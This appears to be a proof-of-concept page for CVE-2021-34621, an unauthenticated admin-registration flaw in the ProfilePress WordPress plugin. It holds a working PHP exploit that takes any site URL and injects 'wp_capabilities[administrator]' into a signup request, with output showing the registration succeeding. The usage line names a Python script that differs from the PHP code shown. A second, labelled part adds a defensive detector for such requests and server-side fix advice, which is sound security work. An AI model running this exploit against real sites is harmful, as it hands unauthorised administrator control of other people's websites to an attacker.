CVE-2021-34621 PoC — WordPress Access Control Error Vulnerability

Associated Vulnerability
Title: WordPress Access Control Error Vulnerability (CVE-2021-34621)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It lets users host a personal blog site on a server running PHP and MySQL. Versions 3.0.0 - 3.1.3 of the ProfilePress plugin for WordPress contain a security vulnerability that originates in the user registration component in the ~/src/Classes/RegistrationAuth.php file. An attacker can exploit this vulnerability to register on the site as an administrator.
Description
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
Readme
# CVE-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

# Description
The user registration functionality of the plugin allowed arbitrary user meta, including wp_capabilities, to be supplied during registration, which made it possible for unauthenticated users to register as an administrator.

# POC
```php
<?php
// Usage: php poc.php <wordpress-url>
// The target site URL is taken from the first command-line argument.
if ($argc < 2) {
    fwrite(STDERR, "Usage: php " . $argv[0] . " <wordpress-url>\n");
    exit(1);
}
$wp_url = rtrim($argv[1], '/');

// Send the signup request to the ProfilePress AJAX handler. Passing an array
// to CURLOPT_POSTFIELDS makes curl send it as multipart/form-data.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'reg_username' => 'Hax0r',
    'reg_email' => 'Hax0r@Hax0r.com',
    'reg_password' => 'password',
    'reg_password_present' => 'true',
    'reg_first_name' => 'Hax0r',
    'reg_last_name' => 'Hax0r',
    // User meta submitted alongside the normal registration fields; the
    // vulnerable versions accept it without filtering.
    'wp_capabilities[administrator]' => '1',
    'action' => 'pp_ajax_signup',
    'melange_id' => ''
]);

$output = curl_exec($ch);
if ($output === false) {
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print_r($output);
```

Script Usage
---

```
$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email test2@test.com --password test
{"message":"<div class=\"profilepress-reg-status success\">Registration successful.<\/div>"}
```
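From the defender's side, the request shape above (a POST to `admin-ajax.php` with `action=pp_ajax_signup` that also carries `wp_capabilities[...]` or `wp_user_level` fields) is the thing to look for, since the plugin's legitimate registration form never sends those keys. The following detector is an added example and is not code from the PoC repository or from ProfilePress. It assumes captured requests are available as records with `src`, `method`, `url`, `content_type` and `body` (as a WAF or reverse proxy that retains request bodies could provide); it parses both urlencoded and multipart bodies (PHP curl sends the array above as multipart) and flags the injected meta keys. The sample records are constructed.

```python
"""Detect ProfilePress signup requests that smuggle privileged user meta.

Added example, not code from the PoC repository: it checks captured HTTP
requests for the pattern CVE-2021-34621 relies on, i.e. user meta such as
wp_capabilities submitted to the pp_ajax_signup action. The request record
format and all sample traffic below are constructed assumptions.
"""
from email.parser import BytesParser
from urllib.parse import parse_qs, urlsplit

# Meta keys a registration form must never be allowed to set directly.
PRIVILEGED_META = ("wp_capabilities", "wp_user_level")


def parse_form_body(content_type, body):
    """Return (name, value) pairs from a urlencoded or multipart form body."""
    ct = content_type.lower()
    if ct.startswith("application/x-www-form-urlencoded"):
        parsed = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
        return [(k, v) for k, values in parsed.items() for v in values]
    if ct.startswith("multipart/form-data"):
        # Reuse the stdlib MIME parser: prepend the Content-Type header so the
        # body is parsed as a multipart message.
        raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
        msg = BytesParser().parsebytes(raw)
        fields = []
        for part in msg.walk():
            if part.is_multipart():
                continue
            name = part.get_param("name", header="content-disposition")
            if name is None:
                continue
            payload = part.get_payload(decode=True) or b""
            fields.append((name, payload.decode("utf-8", "replace")))
        return fields
    return []


def detect_meta_injection(request):
    """Return a finding for a pp_ajax_signup request carrying privileged meta, else None."""
    if request["method"].upper() != "POST":
        return None
    if not urlsplit(request["url"]).path.endswith("/wp-admin/admin-ajax.php"):
        return None
    fields = parse_form_body(request["content_type"], request["body"])
    if "pp_ajax_signup" not in [v for k, v in fields if k == "action"]:
        return None
    # Match plain keys and PHP array syntax such as wp_capabilities[administrator].
    injected = [k for k, _ in fields if k.split("[", 1)[0] in PRIVILEGED_META]
    if not injected:
        return None
    usernames = [v for k, v in fields if k == "reg_username"]
    return {
        "src": request["src"],
        "username": usernames[0] if usernames else None,
        "injected_fields": injected,
    }


def scan(requests):
    """Run the detector over an iterable of request records."""
    return [f for f in (detect_meta_injection(r) for r in requests) if f]


def build_multipart(fields, boundary):
    """Encode fields as multipart/form-data (used here only to build samples)."""
    out = []
    for name, value in fields:
        out.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    return ("".join(out) + f"--{boundary}--\r\n").encode("utf-8")


BOUNDARY = "----demo8b1c"  # constructed
SAMPLE_REQUESTS = [  # constructed sample traffic
    {  # benign registration submitted by the normal form
        "src": "198.51.100.7", "method": "POST",
        "url": "http://wordpress.lan/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": b"reg_username=alice&reg_email=alice%40example.com&reg_password=x&action=pp_ajax_signup",
    },
    {  # same handler, multipart body carrying the injected capability
        "src": "203.0.113.9", "method": "POST",
        "url": "http://wordpress.lan/wp-admin/admin-ajax.php",
        "content_type": f"multipart/form-data; boundary={BOUNDARY}",
        "body": build_multipart([
            ("reg_username", "evil-reg"), ("reg_email", "evil@example.com"),
            ("reg_password", "password"), ("wp_capabilities[administrator]", "1"),
            ("action", "pp_ajax_signup"),
        ], BOUNDARY),
    },
    {  # unrelated AJAX action with the same key: not the vulnerable handler, ignored
        "src": "203.0.113.9", "method": "POST",
        "url": "http://wordpress.lan/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": b"action=heartbeat&wp_capabilities%5Badministrator%5D=1",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The action filter matters: `wp_capabilities` appears legitimately in other admin requests, so alerting on the key alone would be noisy. Pairing the key with the `pp_ajax_signup` action, which unauthenticated clients reach, isolates the abuse case; the durable fix is on the server side, where the registration handler should only persist an allowlist of meta keys.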
File Snapshot

```
[4.0K] /data/pocs/118792beee4eddaa4bfbb4123aecd9fb20026a9a
├── [2.3K] CVE-2021-34621.py
├── [ 34K] LICENSE
└── [1.2K] README.md

0 directories, 3 files
```